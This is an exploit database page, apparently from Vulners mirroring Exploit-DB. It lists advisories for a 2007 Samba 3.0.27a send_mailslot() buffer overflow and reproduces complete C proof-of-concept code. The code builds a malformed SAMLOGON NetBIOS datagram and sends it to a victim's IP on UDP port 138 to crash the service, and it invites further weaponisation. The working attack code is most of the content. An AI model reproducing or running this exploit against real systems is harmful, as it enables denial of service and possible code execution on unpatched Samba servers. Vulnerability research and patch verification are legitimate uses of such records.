Lucene search

K

Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow

πŸ—“οΈΒ 14 Dec 2007Β 00:00:00Reported byΒ x86TypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 90Β Views

Remote buffer overflow in Samba 3.0.27a due to specially crafted "SAMLOGON" domain logon packet, potentially leading to arbitrary code execution with elevated privileges. Exploitable when domain logon support is enabled in Samba

Show more
Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Samba Domain Controller Service Crafted Mailslot Name Buffer Overflow (CVE-2007-6015)
26 Jul 201000:00
–checkpoint_advisories
OpenVAS
SuSE Update for samba SUSE-SA:2007:068
28 Jan 200900:00
–openvas
OpenVAS
Ubuntu Update for samba vulnerability USN-556-1
23 Mar 200900:00
–openvas
OpenVAS
SLES9: Security update for Samba
10 Oct 200900:00
–openvas
OpenVAS
Slackware Advisory SSA:2007-344-01 samba
11 Sep 201200:00
–openvas
OpenVAS
SLES9: Security update for Samba
10 Oct 200900:00
–openvas
OpenVAS
Gentoo Security Advisory GLSA 200712-10 (samba)
24 Sep 200800:00
–openvas
OpenVAS
Debian Security Advisory DSA 1427-1 (samba)
17 Jan 200800:00
–openvas
OpenVAS
Slackware: Security Advisory (SSA:2007-344-01)
10 Sep 201200:00
–openvas
OpenVAS
FreeBSD Ports: samba, samba3, ja-samba
4 Sep 200800:00
–openvas
Rows per page
/* http://secunia.com/secunia_research/2007-99/advisory/
 *
 * A remote attacker could send a specially crafted "SAMLOGON" domain
 * logon packet, possibly leading to the execution of arbitrary code with
 * elevated privileges. Note that this vulnerability is exploitable only
 * when domain logon support is enabled in Samba.
 *
 * ///////
 *
 * Sample/simple POC [crash only] by a bored guy at asmx86 gmail [com], further exploitation or not.. is left as an exercise to the reader.
 *
 * laneleb & petemir, a true love in this world! hi!
 *
 * kangaroo kangaroo...
 */

#include <sys/types.h>
#include <sys/socket.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <unistd.h>  
#include <assert.h>
#include <stdint.h>

/* smb ripped defines/etc */

#define MAX_DGRAM_SIZE 576
#define MAX_NETBIOSNAME_LEN 16
typedef char nstring[MAX_NETBIOSNAME_LEN];
typedef char unstring[MAX_NETBIOSNAME_LEN*4];
enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3};

#define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2)))

#define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */
#define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0xFF),CVAL_NC(buf,pos+1)=(unsigned char)((val)>>8))

#define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val)))
#define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val))

/* A netbios name structure. */
struct nmb_name {
	nstring      name;
	char         scope[64];
	unsigned int name_type;
};

void safe_strcpy(char *a, char *b, uint32_t size)
{
    strcpy(b, a);
}

void put_name(char *dest, const char *name, int pad, unsigned int name_type)
{
    size_t len = strlen(name);

    memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? len : MAX_NETBIOSNAME_LEN - 1);
    if (len < MAX_NETBIOSNAME_LEN - 1)
    {
        memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len);
    }

    dest[MAX_NETBIOSNAME_LEN - 1] = name_type;
}

int put_nmb_name(char *buf,int offset,struct nmb_name *name)
{
    int ret,m;
    nstring buf1;
    char *p;

    if (strcmp(name->name,"*") == 0)
    {
        /* special case for wildcard name */
        put_name(buf1, "*", '\0', name->name_type);
    }
    else
    {
        put_name(buf1, name->name, ' ', name->name_type);
    }

    buf[offset] = 0x20;

    ret = 34;

    for (m=0;m<MAX_NETBIOSNAME_LEN;m++)
    {
        buf[offset+1+2*m] = 'A' + ((buf1[m]>>4)&0xF);
        buf[offset+2+2*m] = 'A' + (buf1[m]&0xF);
    }
    offset += 33;

    buf[offset] = 0;

    if (name->scope[0])
    {
        /* XXXX this scope handling needs testing */
        ret += strlen(name->scope) + 1;
        safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope));

        p = &buf[offset+1];
        while ((p = strchr(p,'.')))
        {
            buf[offset] = PTR_DIFF(p,&buf[offset+1]);
            offset += (buf[offset] + 1);
            p = &buf[offset+1];
        }
        buf[offset] = strlen(&buf[offset+1]);
    }

    return(ret);
}

typedef struct exudp_s
{
    unsigned char msg_type;
    unsigned char flags;
    uint16_t dgm_id;
    uint32_t source_ip;
    uint16_t source_port;
    uint16_t dgm_len;
    uint16_t pOffset;
    struct nmb_name source_name;
    struct nmb_name dest_name;
} exudp;

/* code */

int send_udp(int ip, char *packet, unsigned int packetSize)
{
    int fd;
    struct sockaddr_in to;
    int len;

    if( (fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
        return 0;

    to.sin_family      = AF_INET;
    to.sin_addr.s_addr = ip;
    to.sin_port        = htons(138);

    if( (len = sendto(fd, packet, packetSize, 0, (struct sockaddr *)&to, sizeof(struct sockaddr_in))) < 0)
    {
        perror("sendto");
        return 0;
    }

    return len;
}

int main(int argc, char *argv[])
{
    unsigned char samlogon[10240];
    unsigned int  nlOffset;
    exudp dgPacket;

    printf("smb_mailslot() POC by [email protected]\n\n");

    if(argc < 3)
    {
        printf("Usage: %s <uppercase victim's netbios name> <victim's ip>\n\n", argv[0]);
        exit(1);
    }

    if(strlen(argv[1]) > 15)
    {
        printf("[!] netbios victim's name too long\n");
        exit(1);
    }

    memset(samlogon, 0, sizeof(samlogon));

    dgPacket.msg_type    = 0x11;
    dgPacket.flags       = 1;
    dgPacket.dgm_id      = 0xdead;
    dgPacket.source_ip   = 0xdeadbeef;
    dgPacket.source_port = 0xc0fe;
    dgPacket.dgm_len     = 0;
    dgPacket.pOffset     = 0;

    strcpy(dgPacket.source_name.name, "ASMX86@GMAILCOM");
    strcpy(dgPacket.dest_name.name, argv[1]);

    nlOffset = 14;

    nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.source_name);
    nlOffset += put_nmb_name((char *)&samlogon, nlOffset, &dgPacket.dest_name);

#define OFFSET 97

    nlOffset -= 4;
    SCVAL(samlogon, nlOffset+4, 0);
    SSVAL(samlogon, nlOffset+4+OFFSET, 18);
    SCVAL(samlogon, nlOffset+7, 0);
    SCVAL(samlogon, nlOffset+8, 0x25);
    SSVAL(samlogon, nlOffset+59, 397);

    SSVAL(samlogon, nlOffset+61, OFFSET);

    SSVAL(samlogon, nlOffset+63, 0);

    SSVAL(samlogon, nlOffset+36, 12);
    memcpy(&samlogon[nlOffset+39+(12*2)], "\\MAILSLOT\\NET\\NTLOGON", 21);

    memcpy(&samlogon[nlOffset+4+OFFSET+4],     "\x41\x00\x41\x00\x00\x00", 6);
    memcpy(&samlogon[nlOffset+4+OFFSET+4+6-1], "\x42\x00\x42\x00\x00\x00", 6);
    memset(&samlogon[nlOffset+4+OFFSET+4+6+6], '\x43', 260);                   //play with this value ;)

    nlOffset = 576;

    dgPacket.dgm_len = nlOffset - 14;
    dgPacket.dgm_len = htons(dgPacket.dgm_len);

    memcpy(&samlogon, &dgPacket, 14);

    if(!send_udp(inet_addr(argv[2]), samlogon, nlOffset))
        fprintf(stderr, "[!] Error sending UDP packet\n");
    else
        fprintf(stderr, "[*] packet sent\n");

    return 0;
}
//eof

// milw0rm.com [2007-12-14]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo